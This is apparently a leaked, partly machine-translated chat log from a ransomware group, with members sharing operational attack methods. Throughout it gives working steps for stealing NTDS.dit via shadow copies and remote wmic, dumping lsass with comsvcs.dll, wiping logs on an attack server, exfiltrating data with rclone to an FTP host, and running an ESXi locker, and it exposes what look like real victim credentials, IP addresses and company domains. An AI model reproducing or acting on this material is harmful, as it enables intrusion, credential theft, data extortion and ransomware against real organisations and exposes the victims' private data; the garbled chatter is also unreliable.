specify the protocol explicitly, because the port is not explicit, it will be specified in the output, for example, here is the output of my sessiongopher: ``` "COHLAPTOP75\CSoh", "Shopbop - Development", "z3M>uE/B", "sftp.amazonsedi.com", "2PD11LSYEWJ90", "Use SFTP", "2222" ``` if you just enter in the field host - sftp.amazonsedi.com you will not get connected because the port is not ccp 22 but 2222, in the host you need to specify the protocol explicitly that is sftp://sftp.amazonsedi.com if it says ``. Use FTP over TLS if available", "21" ``` then specify ftps://hostname etc., here is a reminder just in case: ``` ftp:// - For normal ftp connection sftp:// - ssh ftp connection ftps:// - ftp over ssh (implicit) ftpes:// - ftp over ssh (explicit) ``@all are there anyone without cases? @cybercat threw in pm.morning to those who do not sleep, I remember throwing a batik, which stops all services that can interfere with the lock, throw please - urgently need and can not findhttp://www.red-gate.com/products/sql-development/sql-compare/ with this utility you can not look through the whole sql.bak, but restore a separate table from the database and see it@Air fill it in here into the generalinsulation.com folder and let me know how it's done ``` 172.82.162.66 admin 3cT26dDrDCwS ftp 21 port Sometimes there is a hello who is alive? with the context thinly but cranked up) it's like ms17 on win2008buy a token somedomain\usermake_token domain/user times I took a harddisk on which napn was pulled up and went, but did not start then domain account took yesterday received a similar errorgetuid show[*] Tasked beacon to run .NET program: SharpZeroLogon.exe hopo-dc2.holly.local false check [+] host called home, sent: 114807 bytes [+] received output: Performing authentication attempts... Unable to complete server challenge. Possible invalid name or network issues? 
beacon> execute-assembly C:\soft\SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch [*] Tasked beacon to run .NET program: SharpZeroLogon.exe CORIGINDC1.coalcony.com -patch [+] host called home, sent: 114279 bytes [+] received output: Patching failedI had such an output I need time to test it I already sent it for rebuild We'll correct it and add to the toolchain a binary in the form of a dllcheck better sharpzerologon it is more reliable but in general we have a whip access so you can use sharpzeroLogon in the case recently was literally bumped yesterday i can't help but wonder if the problem is solved and i don't give a fuck if it's working or not, but in the log above you can see there are a couple of errors and it doesn't seem to be working either, it's about zero.the zerologon's buildcheck doesn't work for me, it's better to dotnet in the toolchain and pavnin the binary should "crawl" and then say vulnerable or nottoday i'll throw someone check zerologon was able to run? how should the result look? i can get it in testing, i can get the errors right here, but PLEASE leave one message so i don't get confused and there won't be messy@all:handshake:utilities bundle with the corresponding .cna scripts. the documentation will be full within a couple days in pmsamopis ) if you use public obfuscator can give you a link to keep the copy number in the obfuscated command cmd /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\\ & copy \?GGLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\\\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\ ``` who has experience in obfuscating commands in cmd? i agree, thanks a lot. 
interesting way, thanks for the manuscript) if you have a problem with dumping ntds and dropping them from the net, try this way he can burn only the fact of leaking data from the CD, and to analyze what exactly you have without knowing the password from the archive can not be thrown on the forum pokinutnost of this method is that we actually do not dump anything, we just take and pump ntds not to be spotted when we dump the ntds we pack it into a password protected archive shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin list shadows >> c:\log.txt" ``` query the shadows list, there's a date on it, check if it's recent almost for sure they're already there, if not we'll do it ourselves ``` net start Volume Shadow Copy shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c vssadmin create shadow /for=C: 2>&1" ``` then in shadow copy listing find most recent one Shadow Copy Volume: \?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55 Accordingly we need the copy number for the following command ``` shell wmic /node: "DC01" /user: "DOMAIN\admin" /password: "cleartextpass" process call create "cmd /c copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NTDS.dit c:\temp\log\ & copy \\?\"GGLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ & copy \\\? ``` ntds.dit / security / system files should fall into c:\temp\log\ take the portable console 7z and pack it in the archive with the password ``` 7za.exe a -tzip -mx5 \\DC01\C$\temp\log.zip \\DC01\C$\temp\log -pTOPSECRETPASSWORD ``` Download the patented archive to yourself, if you get an error (file is corrupted) when you decrypt the ntds file, do the following ``` Esentutl /p C:\log\ntds.dit ``If it's not too hard = )on the forum please = )for those who are too lazy to read I'll compile it``. 
https://www.c0d3xpl0it.com/2016/10/dumping-ntdsdit-file-from-active-directory.html ``` here's the article I'll make a manual for removing ntds for everyone I've never seen anything better, I made it myself based on what comrade Tony gave me i finally found out i'm not the only one who's so fucking smart and after i did it i found this article from 2016 where the way 1 in 1 is described) i used msf to unlock it not so long ago but it was crooked. what other methods are used to unlock ntds? i assume the majority dumps via ntdsutil? [x]error at JetAttachDatabase() [x]can not load database: JET_errDatabaseDirtyShutdown, Database was not shut down cleanly. Recovery must first be run to properly complete database operations for the previous shutdown. ``` mb who managed to fix it? decrypt I can not, says the file is corrupted or something like thatanyone ntds dump damagi when removed through vssadmin create shadow? give the terms of reference that should write - will doAnyone here specializes in writing scripts for cobalt? need a little advice or lazy) spared 100 bucks to regu on eksper (found on the expanse of the site. "Dutch police registered on the forum of three letters and left a warning for all users. "here does not coo such a method, hidden files on the admin's machine do not even show them, although in fact through PS -hidden 2 files hangs a folder with the entire then display hidden files Complit7zSalam, guys There is a question, anyone know how to pick up files with read-only access? I'm talking specifically about the user keys in %APPDATA%\Microsoft\Protect\\. To then pull the master key off of them how? I already wrote the server to me in pm I'll give it to the hoster let them deal with it. Is it working today? 
``Wait, are you making progress?`` I know, me too) I'll give it to you today without anything else, I'll give you the server metasploit soon,`` 192.111.154.74 ``````172.98.197.98 ``I've got nothing) the dead disk where the msf was and the coba too``` 172.98.197.98 I``ve got nothing ! It's me without everything)``192.111.145.218 ``Dedeepic is mine )), but I got dumb under the msf server )oxmetasploit )I without dedik and mestamoy dedik ```192.111.149.26``` methinks what is it?) I just got the badge yesterday. Guys who do not have dedicates and meth sign here those who have dedicates and ipses ``You have an account there....like everyone has an account...`` Do you have an account there...like there is dr.hash@exploit.im... 200 usd per hash 3700@jabb.im it's up to you All hello, who can help with the ntlm hash brute force? if so - ldap queries through sox work you have to let the bot? maybe if not panicking will put the triggerPlease tell me, sentinel addfind panicking, no? everything worked, thank you ``beacon> shell nslookup 10.30.0.1 ``Do nslookup dns server or something else? nmap? domain name is needed to get adfind off ``Ethernet adapter Ethernet 4: Connection-specific DNS Suffix : Description . . . . . . Fortinet SSL VPN Virtual Ethernet Adapter. Physical Address. . . . 00-09-0F-AA-00-01. DHCP Enabled . . . . No Autoconfiguration Enabled . .: Yes Link-local IPv6 Address . : fe80::6810:5a5e:bc36:b7b7%5(Preferred) IPv4 Address. . . . . .: 10.212.164.25(Preferred) Subnet Mask . . . : 255.255.255.255 Default Gateway . . . . : DHCPv6 IAID . . . . . : 83888399 DHCPv6 Client DUID . . . . : 00-01-00-01-28-5A-D0-32-00-15-5D-59-1A-00 DNS Servers . . . . . : 10.30.0.2 10.30.0.1 NetBIOS over Tcpip. . . . 
.: Enabled ``how do you find the domain?)I have not encountered, but the text is something like either the path to the key file is not correct, or in the single config file it is not correctly entered into the hour and a halfPreviously bilds will update todayokayt slam clients date avazioni start preparing to merge databrandon fury ayr and flintintprevolutionary:zany_face:hello there guys all, here i am back, modem problems were, i'm back on line Killer1986))))elefantkalinka and data all there and add me there add a new channel create there how to transfer@alex transfer to the new rocket on the second 44 days)10 days time of the computer watched?Although the koba not cleaned, but I want to note that the sessions are still dying in memory at night, after about 10-12 hours after creating a sessionjaskask * @alter please add jas tomorrow I will ask you to ... it should be time ... and cleaning will be? so dirty just downloaded myself artkit11mar.7z put it in the scripts and generated it... i just downloaded artkit11mar 7 z i prescribed it in the scripts and generated it... Windowsfed yelled and deleted it right away... i couldn't even run it if i recently updated it, but the StartW function is the same. how do you run this ddla remotely if it fails with one function and the other one fails?if you have a session as you write it flies and alive, the problem is where? is there magic in it? and why run the dll from the desktop? write the full path to the dll problem is that with one function flies and another dies? the same... 
just rolls out the window with an error error in dll.dll missing entry: Control_RunDLLwhat kind of error is this if the session comes alive?) tryStartWhen you run the dll, the error flies out error in dll.dll missing entry: DllInstall - session arrives, but is dead instantly missing entry: Control_RunDLL - session arrives alive :thumbsup:hey, if you have any problems with rising the ccsf session - welcome, there is a solution@all cvmkfDe6Zh7tkWyKwljr2Z80cWSzWSHFTCxPd9OKFgvJsHhVxTdwaTgOd1EUJy12 whose? @all cwf.fr d-box.com groupemontoni.com owners of these cases - waiting for you@all unionleader.com thestaffzone.net owners of these cases, please let me know how do you download them? do you download them as a packaged archive or just as a diru? i can explain how to download from msfvenom and use it without tunneling through cobb who can explain how to make a session in msf without vpn-good manualls:thumbsup i will test@red probably installed it the other way around, but not for sure on Ubuntu it all works yeah, it's better to install the current version@red here i foresee a problem ``apt-get install default-jdk I showed you above how to set the TC for root, but I don't want to run the timeserver only as a user, here's my guide 1. Install the metasplot curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall ; ./msfconsole run the metasplot 2. Install Postgresql apt-get -y install postgresql 3. Installing Armitage wget http://fastandeasyhacking.com/download/armitage150813.tgz tar zxvf armitage150813.tgz Initialize the metasplot base msfdb init ; msfdb reinit - Deletes and reinitializes the database. ; msfdb delete - Deletes the database. ; msfdb start - Starts the database. ; msfdb stop - Stops the database. ; msfdb status - Shows the database status. export MSF_DATABASE_CONFIG=/home/%username%/.msf4/database.yml 5. 
Launch Armitage Teamserver cd /path/to/armitage ./teamserver [external IP address] [password] Useful Links Installing the Metasploit Framework - https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/ Armitage installation - http://www.fastandeasyhacking.com/manual Required Packages 1. take debian or ubuntu dedic (ssh username@hostname) Check availability of postgresql sudo apt install postgresql sudo apt-get -y install postgresql ============================================================================================================================ 2. Download and install the metasplot x64 wget http://downloads.metasploit.com/data/releases/archive/metasploit-4.16.2-2020011301-linux-x64-installer.run Next, we modify (allow the scripts to run) chmod +x metasploit-4.16.2-2020011301-linux-x64-installer.run chmod +x metasploit-4.13.0-2017022101-linux-x64-installer.run Next, install ./metasploit-4.16.2-2020011301-linux-x64-installer.run https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run ============================================================================================================================ Leave all default ports and add a random local domain like addada.com ============================================================================================================================ 4. 
After installing the msf Installing the editor sudo apt install nano Editing scripts 1 nano /etc/init.d/metasploit #exec /opt/metasploit/ctlscript.sh "$@" exec /opt/metasploit/postgresql/scripts/ctl.sh "$@" Editing scripts 2 nano /etc/rc.local add these lines before exit 0 ln -sf /dev/null /var/log/wtmp ln -sf /dev/null /var/run/utmp ln -sf /dev/null /var/log/lastlog ln -sf /dev/null /var/log/auth.log ln -sf /dev/null /var/log/btmp ln -sf /dev/null /var/log/dmesg ln -sf /dev/null /var/log/faillog ln -sf /dev/null /var/log/kern.log ln -sf /dev/null /var/log/syslog ln -sf /dev/null /var/log/user.log ln -sf /dev/null /var/log/secure ln -sf /dev/null /root/.bash_history iptables -A INPUT -i eth0 -p tcp -m tcp --dport 3790 -j DROP ============================================================================================================================ 5. Set the java to make the armitage work apt-get update && apt-get upgrade apt-get install default-jdk ============================================================================================================================ 6. Download and unpack the armitge (toolserver) from this url (tgz archive is up to date) wget http://fastandeasyhacking.com/download/armitage150813.tgz tar zxvf armitage150813.tgz ============================================================================================================================ 7. Change the port in armitage (before running) in the teamserver script near the end of the file nano armitage/teamserver ============================================================================================================================ 8. 
Open screen (so that you can run armitage in the background and exit the server), and run apt-get install screen launch the screen cd /root/armitage && ./teamserver IP PASS (the IP of the external interface of the dedicates and the pass is more complex) ============================================================================================================================ 9. Wait until everything starts and a message appears with the credentials to armitage, and exit the screen with Ctrl+a and then separately d ============================================================================================================================ 10. Change SSH password (passwd root ...) ============================================================================================================================ 11. (change ssh port / make authorization by key to the server) nano /etc/ssh/sshd_config ============================================================================================================================ ``mkdir /opt/ cd /opt/ wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip unzip 4.16.37.zip mv metasploit-framework-4.16.37 metasploit-framework sudo chown -R `whoami` /opt/metasploit-framework cd /opt/metasploit-framework gem install bundler bundle install cd /opt/metasploit-framework sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'@atom easily if msf is properly installed Help me raise the timserver from a normal position. you need a manual on how to raise the timserver, including this manual? but there is a problem with rights, I have not solved it in my own place. armitage guide ``http://www.fastandeasyhacking.com/manual For 3 years now everyone has been writing on forums about this error with bundler and hems, which is why the java won't connect to you$ gem install bundler I'll delete it later so it won't clog up the ether with this script ``` This tutorial is for Ubuntu. 
the first thing we do is install nano, screen, unzip sudo apt-get install nano screen unzip Next, create file 1.sh: nano 1.sh Then insert the code block: 1. installing java (1.sh) Code: sudo apt-get update sudo apt-get -y install --reinstall software-properties-common sudo apt-get install default-jre sudo apt-get update sudo apt-get -y --force-yes install git build-essential unzip libreadline-dev zlib1g-dev nano screen libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev sudo apt-get update sudo apt-get upgrade cd ~ git clone git://github.com/sstephenson/rbenv.git echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc echo 'eval "$(rbenv init -)"' >> ~/.bashrc exec $SHELL then CTRL+X (save) press Y ENTER ENTER repeat the same for each item set the rights: chmod +x 1.sh run 1.sh: ./1.sh Now each command is executed in turn 2. installing ruby (2.sh) Code: git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo exec $SHELL 3. installing ruby (3.sh) Code: RUBYVERSION=2.4.3 rbenv install $RUBYVERSION rbenv global $RUBYVERSION ruby -v 4. installing nmap (4.sh) Code: mkdir ~/Development cd ~/Development git clone https://github.com/nmap/nmap.git cd nmap ./configure make sudo make install make clean 5. create a database and a database user. execute the commands in turn (without. nano): Code: su postgres cd createuser msf -P -S -R -D #enter password qwe31337 createdb -O msf msf exit 6. 
installing msf (5.sh) Code: mkdir /opt/ cd /opt/ wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip unzip 4.16.37.zip mv metasploit-framework-4.16.37 metasploit-framework sudo chown -R `whoami` /opt/metasploit-framework cd /opt/metasploit-framework gem install bundler bundle install cd /opt/metasploit-framework sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done' 7. installing armitage (6.sh) Code: echo cHJvZHVjdGlvbjoNCiBhZGFwdGVyOiBwb3N0Z3Jlc3FsDQogZGF0YWJhc2U6IG1zZg0KIHVzZXJuYW1lOiBtc2YNCiBwYXNzd29yZDogcXdlMzEzMzcNCiBob3N0OiAxMjcuMC4wLjENCiBwb3J0OiA1NDMyDQogcG9vbDogNzUNCiB0aW1Lb3V0OiA1DQo=|base64 --decode > /opt/metasploit-framework/config/database.yml cd /opt/ curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz sudo tar -xvzf /tmp/armitage.tgz -C /opt sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage" sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver After installation, create a screen (to run in the background): screen -dmS arm screen -x arm cd /opt/armitage/ Run ifconfig to check your IP ./teamserver TUT_API_WDSKI TUT_PASSWORD ``You're not clinging to it,`` for some reason your msf is crashing. [*] Metasploit requires the Bundler gem to be installed $ gem install bundler ``I don't even know how to comment on this, does it work? Has anyone encountered this error when starting armitage? 
[*] Starting RPC daemon [*] Metasploit requires the Bundler gem to be installed $ gem install bundler [*] Sleeping for 20s (to let msfrpcd initialize) [*] Starting Armitage team server [*] Warning: checkError(): java.lang.RuntimeException: java.net.ConnectException: Connection refused (Connection refused) at server.sl:450schali it is,yes it puts both armagh and msf on BOX and msf should be on REMOTE BOXhttp://github.com/Matt-London/Install-Armitage-on-Linux what mushrooms are you eating?)))) it does not even need to install) and runs)) 100%armitage simply download) on the site armitage in the instructions are its installationa you armitage or a team serv? no, armitage is not through apt-get installed, and with a guitar if you do not care about the same download, there is armitage `` `` sudo apt-get install armitage -y cd Armitage sudo pip3 install -r requirements.txt sudo python3 armitage.py ``` like this on ubuntu for example koroche@slice have a suspiciona)most likely he meant the guide script for what? you can write a script yourself install it on wps? a few guys who works with armitage? ms17 - smb port kerba - ldapfwd and without sox will work you need to throw portsox5 from polzak who started in the local area? very necessary, polzak context, crowdedstrike, 1 yes, you need at least ms17\kerbu\adfind. edr all jammed all ok) what are these numbers?@graf @slice thanksspro key I know about 5 years ago, it was so-so, now I'll try another activation key and cost 10 - 20 dollarsautokms in virustotal vgoniana any other than crack?) trust me a little too little to nimavtokms?:sweat_smile:except directly to activate))) who knows a working way to remove the activation banner windows? @red downloads may not work if the default address assigned to a domain from the Web, and he originally came through tornashel)-@red on the direct - probably because of e2e, disable it in the settings. How do I get the settings to work properly with downloads? 
Do not work direct-message, ie person writing in direct, he sees the notebook, but when you open the message is not, too, I'm interested in settings such as where and what to prescribe a servak And this is from the corporation picked up, often found such charts, format ` `.vsdx ` ` and opened through VISIO ` Hey, and you yourself draw a diagram or is there any program? who is online urgently!acunetix have you got a working one? sorry guys)understood on the "whole forest" it will only go with the wrong settings for the active directory for which you generatebecause it contains a specific domain sidgolden ticket works only in your domain's neprelekh can someone advise on kerberos::golden created taqet, how now to connect them to the trust host? i will also take a) but later tonight will be) +1there is an urgent need to work@all have hands free? access flew fresh try to remove the backslash from the login, it escapes from this amputation ``` FC944FD5-6FA6-491F-B3AE-055AA04B8DE8 CASTCORP\Veeam_Admin AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380 21857372 2015-11 Veeam_Admin 1 2020-07-29 15:26:43.573 ``` I leave only ``` Decrypt("CASTCORP\Veeam_Admin. AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380="); why is csc.exe veeam.cs not working? 
SQL Management: let's try either raising a Cobalt session and stealing the token of sqlserv
SQL Management Studio, check the owner of your process
"can't" in the subdialog from the context of an untrusted process
who had this error when decrypting Veeam?
```
Msg 916, Level 14, State 1, Server FRVEEAM02\VEEAMSQL2016, Line 1
The server principal "CASTCORP\CASTCJA" is unable to access the database "VeeamBackup" under the current security context.
```
Oh, a bit late) already off) Citrix) will be tomorrow) well, let's take it - see what may be there, and RDP; there may be an opportunity to reach Citrix
@alter is there cmd or rdp?
@all anyone willing to take Citrixes to work through thoroughly?
@all sicaf-cosmetiques.fr I don't see any
@alter hallite.com if it's ours) there's a bouncer there, are there any files from it
@all hilite.com ? someone had it in work but
bouncerfrance.fr - similarly looking for
@all sicaf-cosmetiques.fr who has it ?
the link to the exchange exploit
hash type: auto-select or 256, I don't remember any more; it can be determined by running a bunch through cmd5)
looks like sha256
which hash should go to cmd5? in my opinion the hash there is like sha512
@alter ++++
does someone know how to decrypt Sonic passwords?
can anyone check if Malwarebytes flags dinchek?
+++++
@all are there any fresh Sonic dumpers, nobody has one?
by the way, has nobody ever used WireGuard+Shadowsocks?
I wonder if WireGuard gets picked up in packets; I just don't want to bother with it, I just did it quickly and moved on (when I have a virtual desktop with Kali where it was already set up) no problem) the cat works under Mac
Aha, and came to it, I wanted to do it fast from Mac, I ended up using Kali through thorns to the stars as I always do)
I ran it yesterday with John and never dumped KeePass) and what about KeePass?
I usually dump via the task manager, or mimikatz
who has a compiled lsass dumper?
guys, who has met this error in the installation of JohnTheRipper
```
/usr/bin/ld: cannot find -lz
collect2: error: ld returned 1 exit status
make: *** [Makefile:1409: generic.h] Error 1
```
@all `zCgwK2oXPvi3xkfs9TT4UVLcjvtW24j8PPlrLpOQuWcOkzQ5he9dKzk0Vjd4Vu` whose? `L24K!/3vTUft "*hQ^'A4`
Download: https://qaz.im/load/iHynR4/sQkakd FortiVPN, brother, try it; who works with Fortis now, if everything is ok +
@all https://labs.f-secure.com/tools/c3/vip72
thanks guys!
`https://5socks.net/en_index.htm`
depending on what purpose you take proxies for, you can also buy on white sites, at proxy6 for example; in lux I have access
guys, I need to buy proxies, but I don't know where it's better; I was advised `luxsocksruq3olxa.onion`, look here, but it's too expensive there - $500 just for the entrance ticket. Suggest a couple of options, please
There is no access, even if you try to spawn a new session from the DA. YES I need a token, but something prevents me from doing it, guys, has anyone run into this?
```
[-] could not spawn C:\WINDOWS\system32\cmd.exe /C dir \\10.128.200.208\c$\programdata (token): 5
```
I'm not sure what's going on... I can't read the profile itself, I can't form it, there are guides available... I can't download files, no sleeps, no response; set a sleep, then the file browser or downloaded files takes the sleep and the session falls off for at least 2-3 minutes up to 15-20 minutes; without malleable profiles it seemed normal. Will someone deal with this glitch, is it because of profiles or because of the weak VPN where Cobalt runs? I got the profiles from git, maybe they need configuring, I don't know what to do there, thank you; alter asked to write to whoever of the teammates is available, I have not done anything yet
locker locker locker locker version? for lnx and esxi? preferably with pictures... because the language is a pain in the ass
@all has anyone ever made a data backup from Microsoft 365 from a browser?
is there a manual without any software?
super)
weighs 70 kilobytes, can work from memory
I'll give you a rewritten copy of rclone soon
damn coding, yes, soon
there is rclone support; in monitoring it makes no difference what you download with
We always use rclone, got busted because of it 1 time, and that moment was only because the threads were full, they had the network down... So we are safely pumping, but now, same as with the fly, the error occurs on the last case... We are trying to solve it. Before that everything was working fine and downloading. And the difference between FileZilla with limited speed and rclone with limited speed seems to me not special. If the administrator in the network is competent, he will see it either way, at least what kind of software, and if he does not monitor the network, it does not matter what software you download with and without speed limits. My personal judgement)
Hi. Try another tool, banal FileZilla. In the few cases where we got burned, we blame rclone. FileZilla portable on an unused server, limit the speed, run it from an unused user, minimize it to the tray.
Guys, here's the problem, RCLONE doesn't work. It's uploading to FTP. There is a connection to the FTP and it pings directly. Changed ports and users, hosts and dialers. Fuck, no. Doesn't work with local or remote hosts. I get this error:
```
2021/04/21 20:37:39 ERROR : ftp://45.137.190.251:21/123: Error while Dialing 45.137.190.251:21: dial tcp 45.137.190.251:21: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
2021/04/21 20:37:39 Failed to create file system for "system:123": NewFs: ftpConnection Dial: dial tcp 45.137.190.251:21: connectex: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
```
In other networks everything works, double-checked 10 times.
https://www.pdf2go.com/ru
French from a PNG picture comes out fine as text, but so far I found one option... make a print screen, cut off the name of the company in Paint and feed it in as is; they are all fucking crooked.
Can you suggest offline PDF editors to pull the text from a scanned document? I can't upload to Google Docs and the like since almost every scan has the name of the company on it, that's why I was surprised
there seems to have been some bug of the CP; before this, running through the console gave an error, then tried through the graphical interface - everything is even
but the session, from SYSTEM or another user?
reset the current token first
```
$krb5tgs$23$*14082020Yuri__sqlservice$VTAORTHO.com$MSSQLSvc/VOGDBN02.VTAORTHO.com:1433*$:ventura600650
```
+++
VasyaPypkin +))
+))
no, who is "here" I see))) no questions to you)))) here we are here)
let's keep to the schedule still, otherwise we will get bogged down in long cases)
gentlemen, 15 hours, and where is everyone? = )
airsron
on, got it, sorry
extension zagulutak, what is it? does it have a value? and the title is not clear, just go there?
.CSR - what is the file?
https://github.com/pandasec888/taowu-cobalt-strike/tree/english
click, there is a version of it
there are good Chinese ones: first the palm, now this one pulls where the other does not pull
a clear script
chrome, ff, edge, there's a lot of stuff
http://github.com/pandasec888/taowu-cobalt-strike found the solution in the aggressor script, now I'll tell you what kind of browser, by the way
+
hey guys! who can help me crypt the exe, please give me a plus sign or knock in PM) thanks
http://gist.github.com/HarmJ0y/dc379107cfb4aa7ef5c3ecbac0133a02
there's a chance that I myself will not build it)
never had to export passwords from there
when you build it - tell me =)
https://github.com/GhostPack/SharpDPAPI
https://blog.elcomsoft.com/2020/04/extracting-passwords-from-microsoft-edge-chromium/
is there some kind of program which gets passwords from Edge, like SharpChrome?
Fury
before the locker, check the list of VMs on ESXi so as not to be mistaken; you can (ESXi shell command) `vim-cmd vmsvc/getallvms`
```
Unix version startup options
--path        If this parameter is used, the locker will encrypt files at the specified path. This parameter is obligatory, without it the locker won't encrypt anything.
              ./encryptor --path /path
--prockiller  Kills all processes which interfere with opening files.
              ./encryptor --path /path --prockiller
--log         Enables logging of all actions and errors
              ./encryptor --path /path --log /root/log.txt
--vmkiller    (For esxi only) Turns off all virtual machines
--vmlist      (For esxi only) Sets a file with a list of virtual machines that should not be shut down. One line for each VM
              ./encryptor --path /path --vmkiller --vmlist /tmp/list.txt
--detach      Disconnects the process from the terminal. So that if an ssh session crashes, the locker will keep working and the files won't get corrupted.
ESXi version SHOULD BE REQUIRED separately
If it doesn't start somewhere, I need os, kernel version and glibc version /lib64/libc.so.6
```
Webroot flags the dllinject under Cobalt; does the balloon pan?
has anyone tested it in the last 2-4 weeks?
yeah ok
give me the full composition of hell from here
Killer1986))))
friends, who can share how to make a link to the Cobalt (for phishing emails)
on Windows it's easier to use the link above, which I threw to the technologist, but with Linux I personally dance with a tambourine only
for now I left this venture, will now archive and pump it out through the Cobalt, if RDP is not allowed to be used; tried it that way too, and different clients, because I was worried about remmina - try it both ways
I had a similar network and it was running fine, I don't know why I can't use it from the machine where you connected to; IP or hostname, you don't need to use socket in general if you are connected to the IP, I don't need to use pinging but I checked port 3389 from harp
```
[+] 10.0.1.29: - 10.0.1.29:3389 - TCP OPEN
```
so packets get through; I have a good connection to proxychains and I don't know how to use proxies on this machine, but I am not sure if it is right, I am asking you to correct me: are the proxies valid and is the proxy on it?
I got it, he is connected to the local loop, and if you use a proxy through the Cobalt, it's like you are already in the local loop, ok, I will try it out
dunno what the problem could be with the analogues
had exactly the same problem recently, solved only with the help of native RDP
mstsc also tried ((
I had such a problem, neither hrdp, nor remmina, nor freerdp wanted to connect; try to connect through the regular RDP which is on Windows, and proxy through Proxifier, it should connect
Probably it is not only on this server, on several others the same situation
problem with connection through RDP?
what could the problem be?
help me understand, I was going to download information today, the situation is as follows:
```
[+] 10.0.1.29: - 10.0.1.29:3389 - TCP OPEN
```
port open
```
[+] 10.0.1.29:445 - 10.0.1.29:445 - Success: 'ppmhc\2572cc:Bigdaddy2' Administrator
```
smb login
I can't log on to the host using remmina, when I try to log on I get a certificate, but nothing beyond the certificate; a few lines of proxychains output
```
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - [length=16]
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - MsvAvTargetName AvId: 9 AvLen: 3663300576
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - 0000 54 00 45 00 52 00 4d 00 53 00 52 00 56 00 2f 00 T.E.R.M.S.R.V./.
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - 0016 31 00 30 00 2e 00 30 00 2e 00 31 00 2e 00 37 00 1.0...0...1...7.
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - 0032 37 00 7.
[10:59:06:995] [85132:87227] [INFO][com.winpr.sspi.NTLM] - [length=34]
[10:59:13:037] [85132:87227] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
libfreerdp returned code is 00000000
```
cm confueto alfaraa.
I've already raised the rights here...
give it your context
He's not mashing at all. delete, rename, set the rights - no way.
citrix > LPE
trying to poke around, SharpUp gave this up:
what would the log be, clear the session?
is there a command to clear the console of the beacon specifically?
let me try it, this is all about the remote machine, right?
dump and drag...
you can do tasklist on the machine, find out the PID of the process there, and so in lsass: NTLM hash + maybe cleartext pass + hashdump analog; you can do this, then mimikatz reads it
624 - PID of lsass for example, you can `rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full`
the analogue of the logonpasswords command
Run mimikatz offline in your own place
Can you just dump lsass? tokens ideally
What do you want to find on these PCs? What's the purpose?
tried, AV eats them up, so tried this method
dll, eh, throw it there
yes there are Detects
if you can build - you already built, it seems there is internet?
there is a caveat that there are five hosts where there are the creds; on 3 it jumps on a simple jump but to two not, although smb login shows ok
v1.0/Powershell.exe - is it there? and also show the full command
I'm afraid Kaspersky will flag it like an AV
